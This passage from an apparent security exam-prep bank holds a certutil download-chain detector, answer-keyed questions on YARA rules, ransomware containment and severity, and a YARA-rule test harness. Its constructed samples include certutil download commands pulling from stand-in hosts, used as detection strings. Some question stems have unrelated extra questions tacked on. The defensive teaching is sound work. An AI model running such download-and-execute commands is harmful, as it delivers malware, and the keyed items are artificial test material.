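    return any(marker in p for marker in USER_WRITABLE_MARKERS)


def sha256_of(event):
    """Extract the SHA256 from a Sysmon 'Hashes' field such as 'MD5=..,SHA256=..'."""
    for part in event.get("hashes", "").split(","):
        if part.upper().startswith("SHA256="):
            return part.split("=", 1)[1].lower()
    return None


def find_lolbin_chains(events):
    """Return (downloads, chains).
    downloads: every certutil URL fetch seen (origin URL, dropped path, user).
    chains:    downloads whose dropped file later ran from a user-writable
               directory, with the executing PID/PPID and file hash, i.e. the
               artifacts the analyst needs for root cause and containment."""
    downloads = []
    for ev in events:
        parsed = parse_certutil_download(ev["cmdline"])
        if parsed:
            url, out_path = parsed
            downloads.append({"download_pid": ev["pid"], "user": ev["user"],
                              "origin_url": url, "dropped_path": out_path})
    chains = []
    for d in downloads:
        if not d["dropped_path"]:
            continue
        for ev in events:
            if (ev["image"].lower() == d["dropped_path"].lower()
                    and is_user_writable(ev["image"])):
                chains.append({**d, "executed_pid": ev["pid"],
                               "executed_ppid": ev["ppid"], "sha256": sha256_of(ev)})
    return downloads, chains


if __name__ == "__main__":
    downloads, chains = find_lolbin_chains(EVENTS)
    print(f"{len(downloads)} certutil fetch(es), {len(chains)} executed chain(s)")
    for c in chains:
        print(c)
```

The chain record is what both questions want on the analyst's screen: the origin URL for blocking and intelligence, the dropped path and SHA256 for lookups and for a YARA or EDR sweep across other hosts, and the executing PID and parent for the process tree. The admin's `-hashfile` invocation and the fetch that was never run fall out of the chain list, which is the signed-binary trap handled correctly: the binary is not the finding, the download-and-execute sequence is.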

372
MCQmedium

An analyst has several malware samples from the same campaign and wants to detect related files based on unique strings and byte patterns. Which method is MOST appropriate? In the alert triage phase, which action gives the analyst the clearest next triage step?

A.Tune DHCP lease duration
B.Use only a firewall deny rule for port 443
C.Create and test a YARA rule against known-good and known-bad samples
D.Create a CVE entry
AnswerC

YARA rules are suitable for identifying malware families using file strings, byte sequences, and conditions.

Why this answer

YARA rules are specifically designed to identify and classify malware samples based on textual or binary patterns, including unique strings and byte sequences. By testing a YARA rule against known-good and known-bad samples, the analyst can validate its accuracy and ensure it reliably detects related files from the same campaign while minimizing false positives.

Exam trap

CompTIA often tests the distinction between detection methods (YARA) and network-level controls (DHCP, firewall) or vulnerability management (CVE), leading candidates to choose a familiar but irrelevant option like a firewall rule.

How to eliminate wrong answers

Option A is wrong because tuning DHCP lease duration affects network address assignment and renewal timing, not malware detection or file analysis. Option B is wrong because using only a firewall deny rule for port 443 would block HTTPS traffic but does not help identify or correlate malware samples based on strings or byte patterns. Option D is wrong because creating a CVE entry is a formal process for documenting a vulnerability, not a method for detecting related malware files based on unique strings or byte patterns.
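The answer hinges on the word "test": a rule that matches every sample in the campaign but also fires on an administrator's script is not usable. The following Python script is an added example (not from the question bank) of that validation loop. It evaluates a small YARA-style rule (three strings and an `N of them` condition) against constructed known-bad and known-good corpora, reports the confusion matrix for two condition thresholds, and renders the equivalent real YARA rule that would be compiled with yara-python or the yara CLI for the same test. The rule strings, the "malware" blobs, and the benign files are all invented.

```python
"""Test a YARA-style rule against known-good and known-bad corpora.

Added example, not from the original question bank. The rule strings, the
"malware" blobs and the benign files are all constructed. The matcher below
covers only the subset of YARA used here (plain text and hex strings with an
`N of them` condition); to_yara() emits the equivalent real rule, which is what
you would compile with yara-python or the yara CLI against the same two sets.
"""

# Campaign indicators (constructed): a command fragment, a mutex name and a
# short byte sequence standing in for an embedded key or config marker.
RULE_STRINGS = {
    "$cmd": b"certutil -urlcache -split -f",
    "$mtx": b"Global\\Qx7LockA9",
    "$key": bytes.fromhex("5A7E0C1B33"),
}

KNOWN_BAD = {  # constructed samples from "the campaign"
    "dropper_a.bin": b"MZ\x90\x00" + b"\x00" * 8
                     + b"certutil -urlcache -split -f http://x/a "
                     + b"Global\\Qx7LockA9" + bytes.fromhex("5A7E0C1B33"),
    "dropper_b.bin": b"MZ\x90\x00" + b"Global\\Qx7LockA9" + bytes.fromhex("5A7E0C1B33"),
    "loader_c.bin": b"certutil -urlcache -split -f http://y/c.dat" + bytes.fromhex("5A7E0C1B33"),
}

KNOWN_GOOD = {  # constructed benign files, including a legitimate admin use of certutil
    "admin_fetch.cmd": b"@echo off\r\ncertutil -urlcache -split -f https://intranet/patch.msi patch.msi\r\n",
    "readme.txt": b"Nothing to see here.",
}


def matched_strings(rule_strings, data):
    """Identifiers of every rule string that occurs in data."""
    return [sid for sid, pattern in rule_strings.items() if pattern in data]


def matches(rule_strings, min_matches, data):
    """Evaluate the condition `min_matches of them`."""
    return len(matched_strings(rule_strings, data)) >= min_matches


def evaluate(rule_strings, min_matches, known_bad, known_good):
    """Confusion-matrix style result: which bad samples the rule catches
    (true positives / misses) and which good files it wrongly hits."""
    tp = [n for n, d in known_bad.items() if matches(rule_strings, min_matches, d)]
    fp = [n for n, d in known_good.items() if matches(rule_strings, min_matches, d)]
    return {
        "true_positives": tp,
        "false_negatives": [n for n in known_bad if n not in tp],
        "false_positives": fp,
        "true_negatives": [n for n in known_good if n not in fp],
    }


def to_yara(name, rule_strings, min_matches):
    """Render the rule in YARA syntax (printable strings as text, others as hex)."""
    lines = [f"rule {name}", "{", "    strings:"]
    for sid, pattern in rule_strings.items():
        if all(32 <= b < 127 for b in pattern):
            text = pattern.decode("ascii").replace("\\", "\\\\").replace('"', '\\"')
            lines.append(f'        {sid} = "{text}"')
        else:
            lines.append(f"        {sid} = {{ {pattern.hex(' ').upper()} }}")
    lines += ["    condition:", f"        {min_matches} of them", "}"]
    return "\n".join(lines)


if __name__ == "__main__":
    for n in (1, 2):
        print(f"condition '{n} of them':", evaluate(RULE_STRINGS, n, KNOWN_BAD, KNOWN_GOOD))
    print(to_yara("campaign_dropper", RULE_STRINGS, 2))
```

With `1 of them` the rule catches all three samples but also hits admin_fetch.cmd, because the certutil fragment on its own is something administrators legitimately type. Raising the condition to `2 of them` keeps every true positive (each sample carries at least two of the three indicators) and clears the false positive, which is the tuning decision the known-good corpus exists to force. The same harness should be re-run whenever a new sample or a new benign file is added.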

373
MCQmedium

During a ransomware attack, several workstations have been encrypted. The incident response team has identified the ransomware variant and determined it does not have a known decryption tool. Which containment strategy is MOST appropriate?

A.Disconnect the affected workstations from the network, but leave them powered on.
B.Power off all affected workstations immediately.
C.Run a full antivirus scan on the affected workstations.
D.Restore all affected workstations from backups immediately.
AnswerA

Disconnecting from network stops lateral movement while preserving evidence.

Why this answer

Disconnecting the affected workstations from the network (but leaving them powered on) preserves volatile evidence in memory (e.g., encryption keys, process artifacts) and prevents the ransomware from spreading to other hosts via SMB, RDP, or other lateral movement protocols. Powering off would destroy this critical forensic data, while leaving them connected risks further encryption of network shares.

Exam trap

CompTIA often tests the misconception that immediate power-off is best for safety, but the trap here is that preserving volatile memory for forensic analysis is prioritized over a simple shutdown, especially when no decryption tool exists and evidence may lead to key recovery.

How to eliminate wrong answers

Option B is wrong because immediately powering off workstations destroys volatile memory (RAM) that may contain the ransomware's encryption keys, process handles, or network connections, hindering forensic analysis and potential decryption. Option C is wrong because running a full antivirus scan on already-encrypted files is ineffective—the ransomware binary may be removed, but encrypted files remain unrecoverable without a decryption tool, and scanning consumes time that could allow further spread. Option D is wrong because restoring from backups before containing the threat risks re-infection if the ransomware is still active on the network or if backups are also encrypted; containment must precede recovery.

374
MCQmedium

After a high-priority SOC escalation and containment of a compromised host, analysis shows persistence through a scheduled task and a stolen service account. What is required before recovery? Which response best matches incident-response practice?

A.Reconnect the host because users need it
B.Disable logging to improve performance
C.Close the incident after isolation
D.Remove persistence, rotate affected credentials, and verify no related hosts remain compromised
AnswerD

Recovery should follow eradication of persistence and credential exposure. In containment, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option D is correct because, after containment, the process requires removing the persistence mechanism (the scheduled task), rotating the stolen service account's credentials so the attacker cannot re-authenticate, and checking that no other hosts were reached through lateral movement. This is the eradication step of the containment, eradication, and recovery phase in NIST SP 800-61: recovery starts only after the threat has been fully removed.

Exam trap

CompTIA often tests the misconception that isolation alone is sufficient to close an incident, but the trap here is that persistence and credential theft require active eradication and verification steps before recovery can begin.

How to eliminate wrong answers

Option A is wrong because reconnecting a compromised host without eradication risks re-infection or lateral movement, undoing containment. Option B is wrong because disabling logging during an incident destroys the evidence trail that responders and investigators depend on; logging is critical for post-incident analysis. Option C is wrong because closing the incident after isolation without eradication and verification leaves the persistence mechanism and the stolen credentials active, allowing the attacker to regain access.

375
MCQmedium

In a regulated payment environment, a malware alert affects a single kiosk with no sensitive access. A second alert shows the same malware on a domain admin workstation. What should drive severity? During recovery, which decision is most defensible? Which action best reduces risk without losing evidence?

A.Whether the alert arrived first
B.Business impact, privilege level, asset criticality, and spread potential
C.Alphabetical order of hostnames
D.The analyst's preferred dashboard theme
AnswerB

Severity should reflect impact and risk, not only malware family name. In recovery, responders need action that reduces risk while preserving the investigation record.

Why this answer

Option B is correct because severity in incident response must be driven by business impact, privilege level, asset criticality, and spread potential. The domain admin workstation has elevated privileges and access to sensitive systems, making it a higher priority than a non-sensitive kiosk, regardless of alert order. This aligns with NIST SP 800-61 and common IR frameworks that prioritize containment based on risk, not chronology.

Exam trap

CompTIA often tests the misconception that alert chronology or simple asset labels determine severity, when in fact the correct approach is a risk-based assessment incorporating business impact, privilege, criticality, and spread potential.

How to eliminate wrong answers

Option A is wrong because alert arrival time is irrelevant to severity; a later alert on a critical asset should supersede an earlier alert on a low-value asset. Option C is wrong because alphabetical order of hostnames has no bearing on risk or incident response priority. Option D is wrong because an analyst's preferred dashboard theme is a cosmetic preference and does not influence severity decisions.
